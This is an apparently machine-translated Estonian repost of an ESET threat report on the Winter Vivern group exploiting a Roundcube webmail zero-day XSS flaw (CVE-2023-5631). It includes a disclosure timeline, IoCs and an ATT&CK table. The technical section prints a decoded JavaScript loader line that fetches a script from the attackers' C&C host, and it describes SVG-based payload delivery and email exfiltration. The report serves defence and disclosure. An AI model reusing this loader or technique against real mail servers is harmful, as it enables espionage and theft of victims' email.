ESET-i uuringud
ESET Research soovitab värskendada Roundcube Webmaili võimalikult kiiresti uusimale saadaolevale versioonile
Oktoober 25 2023 • , 5 min. lugeda
ESET Research on Winter Viverni küberspionaažioperatsioone tähelepanelikult jälginud rohkem kui aasta ja meie rutiinse jälgimise käigus avastasime, et grupp hakkas ära kasutama nullpäeva. XSS haavatavus Roundcube'i veebimeili serveris 11. oktoobrilth, 2023. See on teistsugune haavatavus kui CVE-2020-35730, mida rühm meie uuringu kohaselt ka ära kasutas.
ESET-i telemeetriaandmete kohaselt oli kampaania suunatud valitsusasutustele ja mõttekojale kuuluvatele Roundcube Webmaili serveritele, kõik Euroopas.
Haavatavuse avalikustamise ajakava:
- 2023-10-12: ESET Research teatas haavatavusest Roundcube'i meeskonnale.
- 2023-10-14: Roundcube'i meeskond vastas ja tunnistas haavatavust.
- 2023-10-14: Roundcube'i meeskond parandas haavatavuse.
- 2023-10-16: Roundcube'i meeskond andis haavatavuse kõrvaldamiseks välja turvavärskendused (1.6.4, 1.5.5 ja 1.4.15).
- 2023-10-18: ESET CNA väljastab haavatavuse kohta CVE (CVE-2023-5631).
- 2023-10-25: ESET Researchi ajaveebipostitus on avaldatud.
Täname Roundcube'i arendajaid kiire vastuse ja haavatavuse parandamise eest nii lühikese aja jooksul.
Winter Vivern profiil
Winter Vivern on küberspionaažirühm, mille esimesena paljastas Domeenitööriistad 2021. aastal. Arvatakse, et see on olnud aktiivne vähemalt 2020. aastast ning see on suunatud Euroopa ja Kesk-Aasia valitsustele. Oma sihtmärkide ohustamiseks kasutab rühm pahatahtlikke dokumente, andmepüügiveebisaite ja kohandatud PowerShelli tagaust (vt artikleid Ukraina riiklik küberkaitsekeskus ja SentinelLabs). Usume vähese kindlusega, et Winter Vivern on seotud VuntsitudBouncer, keerukas Valgevenega seotud rühm, mille kohta avaldasime esmakordselt 2023. aasta augustis.
Winter Vivern on sihtinud valitsusasutustele kuuluvaid Zimbra ja Roundcube'i meiliservereid vähemalt aastast 2022 – vaadake seda artiklit Proofpoint. Eelkõige täheldasime, et rühmitus kasutas ära CVE-2020-35730, 2023. aasta augustis ja septembris Roundcube'i veel üks XSS-i haavatavus. Pange tähele Sednit (tuntud ka kui APT28) kasutab seda vana XSS-i haavatavust ka Roundcube'is, mõnikord samade sihtmärkide vastu.
Tehnilised detailid
XSS-i haavatavuse ärakasutamine, määratud CVE-2023-5631, saab teha kaugjuhtimisega, saates spetsiaalselt koostatud meilisõnumi. Selles Winter Viverni kampaanias saadeti meilid aadressilt team.managment@outlook[.]com ja oli teema Alustage oma Outlooki kasutamist, nagu näidatud Joonis 1.
Esmapilgul ei tundu meil pahatahtlik, kuid kui uurime HTML-i lähtekoodi, Joonis 2, näeme lõpus SVG-märgendit, mis sisaldab base64-kodeeringuga kasulikku koormust.
Kui dekodeerime base64-kodeeritud väärtuse failis href atribuut kasutama silt, meil on:
'))” />
Kui x väärtus argument href atribuut ei ole kehtiv URL, selle objekti oma viga atribuut aktiveeritakse. Kasuliku koormuse dekodeerimine viga atribuut annab meile järgmise JavaScripti koodi (millega pahatahtlik URL on käsitsi rikutud), mis käivitatakse ohvri brauseris Roundcube'i seansi kontekstis:
var fe=document.createElement('script');fe.src=”https://recsecas[.]com/controlserver/checkupdate.js”;document.body.appendChild(fe);
Üllataval kombel märkasime, et JavaScripti süstimine töötas täielikult paigatud Roundcube'i eksemplaril. Selgus, et tegemist oli nullpäevase XSS-i haavatavusega, mis mõjutab serveripoolset skripti rcube_washtml.php, mis ei desinfitseeri korralikult pahatahtlikku SVG-dokumenti enne selle lisamist Roundcube'i kasutaja tõlgendatud HTML-lehele. Teatasime sellest Roundcube'ile ja nii oligi parandatud oktoobril 14th, 2023 (vt seda endale). Haavatavus mõjutab Roundcube'i versioonid 1.6.x enne 1.6.4, 1.5.x enne 1.5.5 ja 1.4.x enne 1.4.15.
Kokkuvõtteks võib öelda, et spetsiaalselt koostatud meilisõnumi saates saavad ründajad laadida suvalise JavaScripti koodi Roundcube'i kasutaja brauseriakna kontekstis. Käsitsi ei ole vaja muud tegevust peale sõnumi vaatamise veebibrauseris.
Teine etapp on lihtne JavaScripti laadija nimega checkupdate.js ja on näidatud Joonis 3.
Lõplik JavaScripti kasulik koormus – näidatud Joonis 4 - suudab loetleda praeguse Roundcube'i konto kaustu ja e-kirju ning filtreerida meilisõnumeid C&C serverisse, tehes HTTP-päringuid https://recsecas[.]com/controlserver/saveMessage.
Järeldus
Winter Vivern on oma tegevust tõhustanud, kasutades Roundcube'i nullpäeva turvaauku. Varem kasutas see Roundcube'i ja Zimbra teadaolevaid turvaauke, mille kontseptsiooni tõendid on Internetis saadaval.
Vaatamata grupi tööriistakomplekti madalale keerukusele on see Euroopa valitsustele oht oma püsivuse, andmepüügikampaaniate väga regulaarse käitamise ja seetõttu, et suurt hulka Interneti-rakendusi ei värskendata regulaarselt, kuigi need sisaldavad teadaolevalt turvaauke. .
Kui teil on küsimusi meie WeLiveSecurity avaldatud uurimistöö kohta, võtke meiega ühendust aadressil [meiliga kaitstud].
ESET Research pakub privaatseid APT luurearuandeid ja andmevooge. Kui teil on selle teenuse kohta küsimusi, külastage aadressi ESET Threat Intelligence lehel.
IoC-d
Faile
SHA-1 |
Faili |
Detection |
Kirjeldus |
97ED594EF2B5755F0549C6C5758377C0B87CFAE0 |
checkupdate.js |
JS/WinterVivern.B |
JavaScripti laadija. |
8BF7FCC70F6CE032217D9210EF30314DDD6B8135 |
N / A |
JS/Kryptik.BIK |
Roundcube'is e-kirjade eemaldamine JavaScripti kasulikust koormusest. |
võrk
IP |
Domeen |
Hostimise pakkuja |
Esimest korda nähtud |
Detailid |
38.180.76[.]31 |
recsecas[.]com |
M247 Europe SRL |
2023-09-28 |
Winter Vivern C&C server |
E-posti aadressid
team.managment@outlook[.]com
See laud on ehitatud kasutades versioon 13 MITER ATT&CK raamistikust.
Taktika |
ID |
Nimi |
Kirjeldus |
Ressursside arendamine |
Taristu hankimine: domeenid |
Winter Viverni operaatorid ostsid domeeni aadressilt Registrar.eu. |
|
Hankige infrastruktuur: server |
Winter Viverni operaatorid rentisid serveri aadressil M247. |
||
Võimaluste arendamine: ärakasutamine |
Winter Viverni operaatorid töötasid tõenäoliselt välja Roundcube'i jaoks ärakasutamise. |
||
Esialgne juurdepääs |
Kasutage avalikku rakendust |
Winter Vivern saatis meili, milles kasutati Roundcube'is CVE-2023-5631. |
|
Phishing |
Haavatavus käivitatakse andmepüügimeili kaudu, mille ohver peaks avama Roundcube'i veebimeilis. |
||
Täitmine |
Kasutamine kliendi täitmiseks |
JavaScripti kasulikku koormust käivitab Roundcube'i XSS-i haavatavus. |
|
avastus |
Konto avastamine: meilikonto |
JavaScripti kasulik koormus võib loetleda meilikonto kaustu. |
|
kogumine |
Meilikogu: meili kaugkogu |
JavaScripti kasulik koormus võib Roundcube'i kontolt e-kirju välja filtreerida. |
|
Juhtimine ja kontroll |
Rakenduskihi protokoll: veebiprotokollid |
C&C suhtlus kasutab HTTP-sid. |
|
Välja filtreerimine |
Eksfiltratsioon C2 kanali kaudu |
Eksfiltreerimine toimub HTTP-de kaudu ja samasse C&C serverisse. |
- SEO-põhise sisu ja PR-levi. Võimenduge juba täna.
- PlatoData.Network Vertikaalne generatiivne Ai. Jõustage ennast. Juurdepääs siia.
- PlatoAiStream. Web3 luure. Täiustatud teadmised. Juurdepääs siia.
- PlatoESG. Süsinik, CleanTech, Energia, Keskkond päikeseenergia, Jäätmekäitluse. Juurdepääs siia.
- PlatoTervis. Biotehnoloogia ja kliiniliste uuringute luureandmed. Juurdepääs siia.
- Allikas: https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/